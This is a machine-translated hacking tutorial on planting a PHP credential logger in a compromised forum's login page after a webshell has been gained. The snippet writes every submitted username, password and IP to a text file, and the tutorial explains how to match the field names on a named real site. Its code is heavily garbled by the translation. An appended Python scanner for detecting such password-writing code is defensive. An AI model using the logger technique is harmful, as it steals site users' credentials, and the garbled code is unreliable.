After obtaining a webshell, cracking passwords for further penetration is often difficult, because applications such as Discuz do not use plain MD5 directly. I wrote this once before for big data. I wrote it again yesterday when the big brother pig was easy to use. The code is relatively simple. In a few words, I will explain the principle in detail for friends who do not know much about PHP.
If ($ _ POST [loginSuBmit]! =) {// Determine whether the login button is clicked
$ Sb = user:. $ _ POST [username]. --Passwd:. $ _ POST [password]. -- ip:. $ HTTP_SERVER_VARS [REMOTE_ADDR]. --.Date(Y-m-d H: I: s). rn; // concatenate the value received by POST and assign it to the variable $ sb.
FWrite(Fopen(robot.txt, AB), $ sb);} // write the result into a file
The following is a brief analysis. The login page of China is used as an example. OpenBbs.77169.com/login.php right-click to view the source code, CTRL + F search for action to find the login form.
I only copied the key code.
RmAction = login. php? Method = post name = login onSubmit = this. submit. disabl Ed= TrUe;> // The value after the action is the address submitted by the form, which will process login. For example, if the method to determine whether the password is correct or not is POST, it is received using $ _ POST.
.... Powerful ellipsis ......
Account (U):
Class = inputId= Pwuser accessKey = u size = 16
Name = pwuser>// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. To intercept the Chinese password, change it to $ _ POST [pwuser].
Password (P):
Class = input id = pwPwdAccessKey = p
Type = password size = 16 name = pwpwd>// Input box of the user name. Note that the value of the user name corresponds to $ _ POST [username]. To intercept the Chinese password, change it to $ _ POST [pwpwd].
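From the defender's side, the modification described above has a recognizable shape in PHP source: a password field taken from $_POST ends up in a call that writes to disk. The scanner below is an added example, not code from the original page. The sink list, the file extensions and the names scan_php and scan_tree are assumptions chosen for illustration, and the variable tracking is a line-based heuristic rather than a real PHP parser.

```python
import re
import sys
from pathlib import Path

# Password-like request fields, quoted or bare (covers password, passwd, pwpwd).
CRED_FIELD = re.compile(
    r'''\$_(?:POST|REQUEST)\s*\[\s*['"]?(\w*(?:pass|pwd)\w*)''', re.I)
# Assumed sink list: PHP calls that persist or send data outside the request.
SINK = re.compile(r"\b(fwrite|fputs|file_put_contents|error_log|mail)\s*\(", re.I)
# "$var =" or "$var .=" but not "==", "===" or "=>".
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?![=>])")

def scan_php(source):
    """Return (line_no, sink, field) for each sink a password field reaches."""
    tainted = {}    # variable name -> request field it was built from
    findings = []
    for no, line in enumerate(source.splitlines(), 1):
        match = CRED_FIELD.search(line)
        field = match.group(1) if match else None
        if field is None:
            # No direct use: check for a variable built from a password earlier.
            for var, src in tainted.items():
                if re.search(re.escape(var) + r"\b", line):
                    field = src
                    break
        if field is None:
            continue
        assign = ASSIGN.search(line)
        if assign:
            tainted[assign.group(1)] = field
        sink = SINK.search(line)
        if sink:
            findings.append((no, sink.group(1).lower(), field))
    return findings

def scan_tree(root):
    """Scan PHP-like files under root; returns {path: findings} for hits only."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".inc", ".phtml"}:
            hits = scan_php(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for no, sink, field in hits:
            print(f"{path}:{no}: request field '{field}' reaches {sink}()")
```

Run it against the web root and compare any hits with a known-good copy of the application. Unexpected writable files next to the login script are a second signal worth checking.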